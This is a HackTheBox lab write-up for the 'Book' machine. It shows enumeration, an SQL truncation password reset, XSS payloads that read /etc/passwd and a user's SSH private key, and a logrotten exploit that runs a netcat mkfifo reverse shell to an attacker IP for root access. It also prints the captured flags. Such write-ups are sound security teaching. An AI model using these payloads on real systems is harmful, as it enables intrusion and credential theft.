Summary

Book,a Linux box created by HackTheBox user egotisticalSW, was an overall hard difficulty box. The initial enumeration shows only port 22 and 80 opened. Enumerating the web we find /admin and index.php which have login and sign-up.
Using which we expose the admin email-id. Using SQL truncate attack we can reset the password for admin. and login to /admin we also see that the Book upload is vulnerable to XSS which create a SSRF and using that we can get an LFI and read ssh private key for the user. Enumerating we see that logrotate is running and the log file is writable by us. Looking searchsploit we find logrotten which exploit a race condition and using that we can get a shell as root (or grab root .ssh private key and get shell as root.)

Enumeration

Initial Scan nmap

# Nmap 7.80 scan initiated Sat Feb 22 14:05:22 2020 as: nmap -sS -sV -T 4 -oA /root/HackTheBox/machine/Book/legion//10.10.10.176/general//../..//10.10.10.176/scanner/1337/../nmapi 10.10.10.176
Nmap scan report for 10.10.10.176
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 22 14:06:11 2020 -- 1 IP address (1 host up) scanned in 48.24 seconds

Only show port 22 and 80

So lets focus on web

So we sign up see the email for admin on the feedback page as admin@book.htb and we don’t see anything interesting. Lets run go-buster.

/download.php (Status: 302)
/images (Status: 301)
/contact.php (Status: 302)
/search.php (Status: 302)
/index.php (Status: 200)
/home.php (Status: 302)
/profile.php (Status: 302)
/docs (Status: 301)
/books.php (Status: 302)
/feedback.php (Status: 302)
/admin (Status: 301)
/db.php (Status: 200)
/logout.php (Status: 302)
/collections.php (Status: 302)
/settings.php (Status: 302)

we find /admin which is the login for admin lets try to reset the password using SQL Truncation attack

using this we reset the admin password and we can login

After login to admin panel we see that Collections.php have a code to generate a dynamic pdf of all the User and Collections uploaded.

Looking on the Book Upload we find that name and author for Upload feature has XSS vulnerable. So we upload a File with a xss payload as

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

in name and author field, trying to read the passwd and we can download that in the pdf

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-
data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats
Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-
network:x:100:102:systemd Network
Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-
resolve:x:101:103:systemd
Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
reader:x:1000:1000:reader:/home/reader:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

from the passwd file we can see that the user with a bash shell are only root and reader

User

Making some educated guesses we try to read the ssh private key for the user and grabbing it.

<script>x=new XMLHttpRequest;x.onload=function(){ var str = this.responseText;  var result = ''; while (str.length > 0) {result += str.substring(0, 20) + '\n';    str = str.substring(20);}document.write(result);};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>

Now we have the private key for the user so we can get a shell as reader

$ ssh -i key.pem reader@10.10.10.176

and get user.txt as 51c1d4b5197fa30e3e5d37f8778f95bc

Privilege Escalation

Enumerating the box initially i don’t see anything interesting so i put pspy and saw that log-rotate is running every few seconds.

Looking for exploit for logrotate we stumble upon logrotten on exploitdb.

Lets use that to get a shell as root.

Reading through the exploit we see the pre-condition are that we should be able to write to a log and log-rotate running as root. which is satisfied here

So we create a payload to give us a shell as root using simple nc mkfio revshell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.X.X 9000 >/tmp/f

and running the logrotten as

./logrotten -p ./payloadfile /home/reader/backups/access.log

and triggering the rotation to happen by appending anything in access.log

and waiting a few seconds we see that logrotten winning the race condition and running our payload.

and we getting a shell as root. using which we can read the root.txt

84da92adf998a1c7231297f70dd89714

and we have pwned Book 💃

NOTE: The shell we get is very unstable the other thing we can do is to grab root ssh private key to access it via ssh.